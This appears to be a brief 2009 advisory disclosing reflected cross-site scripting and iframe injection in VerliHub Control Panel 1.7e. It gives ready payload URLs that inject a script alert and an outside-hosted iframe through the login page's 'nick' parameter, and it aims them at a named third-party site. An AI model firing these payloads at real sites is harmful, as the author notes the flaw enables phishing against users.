VerliHub Control Panel version 1.7e suffers from cross site scripting and iframe injection vulnerabilities.
7635916779b1974ce826340348988295154a3a9bfc52105687d3677be7db0d46
VerliHub Control Panel - v 1.7e XSS & Iframe Injection Vulnerability
http://vhcp.verlihub-project.org
-6-05-2009
-Methodman - http://nemesis.te-home.net
-Example:-
Cross-site scripting vulnerability on login page
http://vhcp.com/index.php?page=login&nick="><script>alert("Vulnerable");</script>
http://vhcp.com/index.php?page=login&nick="><iframe src=
http://nemesis.te-home.net/index.html?news></iframe>
-Proof of Concept:-
http://wiretransfers.net/index.php?page=login&nick="><script>alert("Vulnerable");</script>
http://wiretransfers.net/index.php?page=login&nick="><iframe src=
http://nemesis.te-home.net/index.html?news></iframe>
-Nice screen:-
http://img7.imageshack.us/img7/4660/vhcp.jpg
Vulnerability that can be used to perform phishing attacks
[so verlibug sucks++++ =))]
/teamelite 2009